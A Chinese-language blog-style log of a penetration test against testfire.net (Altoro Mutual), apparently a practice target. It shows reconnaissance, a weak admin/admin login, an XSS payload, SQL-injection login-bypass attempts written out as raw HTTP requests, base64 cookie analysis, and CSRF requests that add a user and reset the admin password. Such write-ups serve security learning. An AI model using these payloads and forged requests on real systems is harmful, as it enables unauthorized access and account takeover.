5

记一下渗透测试

目标

testfire.net

CDN

信息收集下:

因为是单一的站点 就测一下指纹:

image-20210426202141917

单一的url! 看看有没有啥旁站啥的!

看看子域名

image-20210426202414222

序号 子域名 标题 IP地址 服务
1 demo.testfire.net Altoro Mutual 65.61.137.117 Apache-Coyote/1.1
2 www.testfire.net Altoro Mutual 65.61.137.117 Apache-Coyote/1.1
3 testfire.net Altoro Mutual 65.61.137.117 Apache-Coyote/1.1

旁站

image-20210426202727405

漏扫

先上常用的扫描器! 扫一扫

存在 sql注入 xss 等等漏洞

手工+xray联合测试

手工 测试一下 扫描器的漏洞!

先 找其中一个站点

扫描 | 爬取一下 目录结构(java站点)

namp跑一下看下 系统 win系统 试了试不是win 还是个linux系统

image-20210426232047427

image-20210426203630454

image-20210427152925989

image-20210427153003879

弱口令

扫描结果

302 页面都跳转到:

http://65.61.137.117:8080/login.jsp

发现存在弱口令漏洞:

admin admin

xss

image-20210426232406401

测试发现有xss漏洞

image-20210426232419604

payload

<script>alert(1)</script>

image-20210426232502532

image-20210427000311242

httponly

这个可以防范cookie盗取! 但是还是有取它危害可以利用! 😑

也没有CSP

文件包含

image-20210426233235064

但是读

image-20210426233338449

image-20210426233612988

image-20210426233458908

存储型xss

http://www.testfire.net/feedback.jsp

image-20210427001255470

image-20210427001326925

sql注入

数据包

POST /doLogin HTTP/1.1
Origin: http://65.61.137.117:8080
Content-Length: 57
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Host: 65.61.137.117:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Connection: close
Referer: http://65.61.137.117:8080/login.jsp
Cache-Control: max-age=0
Cookie: JSESSIONID=FD515BF0B4041F280B299F5F58B86631; AltoroAccounts=ODAwMDAwfkNvcnBvcmF0ZX41LjIzODc5OTU2MUU3fDgwMDAwMX5DaGVja2luZ34xMDA2MDguNDR8
User-Agent: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.3) Gecko/20060425 SUSE/1.5.0.3-7 Firefox/1.5.0.3
Content-Type: application/x-www-form-urlencoded

uid=admin&passw=1'/**/or/**/1=(1)/**/-- -&btnSubmit=Login

/doLogin 页面

image-20210426235059094

image-20210426235109062

验证poc

admin'/**/or/**/1=1/**//**/-- -

admin'/**/or/**/1=0/**//**/-- -

他这里应该过滤了很多东西!

语句达不到 注入效果! 数据库类型没判断成功!

cookie加密算法过于简单

base64加密

image-20210426235959335

后台弱口令测试

登录后台

POST /admin/doAdminLogin HTTP/1.1
Host: www.testfire.net
Content-Length: 35
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Origin: http://www.testfire.net
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.testfire.net/admin/login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=7A74CF311FA64D4C998ED838FB3DCE43; AltoroAccounts=ODAwMDAwfkNvcnBvcmF0ZX41LjE5NzYyNjU2MUU3fDgwMDAwMX5DaGVja2luZ341Mzk1NTEuNDR8
Connection: close

password=!Q@W#E$R%T&btnSubmit=Login

发现302跳转

有跳回原页面了!

试一试万能密码!

没成功!

POST /admin/doAdminLogin HTTP/1.1
Host: www.testfire.net
Content-Length: 48
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Origin: http://www.testfire.net
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.testfire.net/admin/login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=7A74CF311FA64D4C998ED838FB3DCE43; AltoroAccounts=ODAwMDAwfkNvcnBvcmF0ZX41LjE5NzYyNjU2MUU3fDgwMDAwMX5DaGVja2luZ341Mzk1NTEuNDR8
Connection: close

password=1'/**/or/**/1=1/**/-- -&btnSubmit=Login

csrf

POST /admin/admin.jsp HTTP/1.1
Host: www.testfire.net
Content-Length: 95
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.testfire.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.testfire.net/admin/admin.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=7A74CF311FA64D4C998ED838FB3DCE43; AltoroAccounts=ODAwMDAwfkNvcnBvcmF0ZX41LjE5NzYyNjU2MUU3fDgwMDAwMX5DaGVja2luZ341Mzk1NTEuNDR8
Connection: close

firstname=upload&lastname=upload&username=upload&password1=123456&password2=123456&add=Add+User

image-20210427153315206

POST /admin/admin.jsp HTTP/1.1
Host: www.testfire.net
Content-Length: 71
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.testfire.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.testfire.net/admin/admin.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=7A74CF311FA64D4C998ED838FB3DCE43; AltoroAccounts=ODAwMDAwfkNvcnBvcmF0ZX41LjIwODg5NDM2MUU3fDgwMDAwMX5DaGVja2luZ340MjY4NzMuNDR8
Connection: close

username=admin&password1=123456&password2=123456&change=Change+Password

这个CSRF 要先登录 ! 但是发给管理员应该还是能利用的!

敏感信息泄露

暴露路由了

https://65.61.137.117/swagger/index.html#/

swagger 界面

https://65.61.137.117/swagger/index.html#/